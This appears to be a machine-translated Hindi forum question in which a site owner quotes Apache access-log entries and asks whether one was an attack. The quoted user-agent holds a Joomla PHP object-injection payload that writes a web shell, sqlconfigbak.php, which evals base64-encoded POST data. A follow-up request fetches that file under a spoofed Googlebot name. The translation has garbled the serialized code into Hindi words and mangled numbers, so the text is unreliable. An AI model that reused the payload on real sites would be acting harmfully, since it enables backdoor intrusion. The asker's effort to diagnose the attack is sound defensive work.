मेरी साइट पर अपाचे प्रवेश लॉग प्रविष्टियाँ आमतौर पर इस तरह होती हैं:
207.46.13.174 - - [31 / अक्टूबर / 2016: 10: 18: 55 +0100] "GET / संपर्क HTTP / 1.1" 200 256 "-" "मोज़िला / 5.0 (संगत; bingbot / 2.0; + http: // www) .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
इसलिए आप उपयोगकर्ता-एजेंट फ़ील्ड को वहां देख सकते हैं। लेकिन आज मुझे उपयोगकर्ता-एजेंट फ़ील्ड भी इस तरह से मिला:
62.210.162.42 - - [31 / अक्टूबर / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ परीक्षण | O: 21: 21:" JDatabaseDriadMysqli ": 3: {s: 2 : "एफसी"; हे: 17: "JSimplepieFactory": 0: {} रों: 21: "\ 0 \ 0 \ 0disconnectHandlers", एक: 1: {मैं: 0; एक: 2: {मैं: 0; हे: 9: "SimplePie": 5: {s: 8: "स्वच्छ", हे: 20: "JDatabaseDriverMysql": 0: {} रों: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ सर्वर [" DOCUMENT_ROOT " ] .chr (४ 47)। "sqlconfigbak.php", "= | = \ _ x3C"। x24xsser = base64_decode (\ x24_POST [ 'z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); बाहर निकलें," की: 19: " cache_name_function "की: 6:" ज़ोर "की: 5:" कैश ", ख: 1; रों: 11:" cache_class "; हे: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}}: s: 13:" \ 0 \ 0 \ 0conconection; b: 1;} ~; ~ Ů "0.304 BYPASS 10.10.36.125:104 0.304
क्या यह हमला था? अगली लॉग प्रविष्टि sqlconfigbak.php
स्क्रिप्ट में उल्लिखित सफलतापूर्वक (कोड 200) फ़ाइल को पुनर्प्राप्त करने के लिए प्रकट होती है । हालाँकि मुझे फ़ाइल सिस्टम में फ़ाइल नहीं मिली:
62.210.162.42 - - [31 / अक्टूबर / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "मोज़िला / 5.0 (संगत; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244
कृपया यहाँ क्या हो रहा था?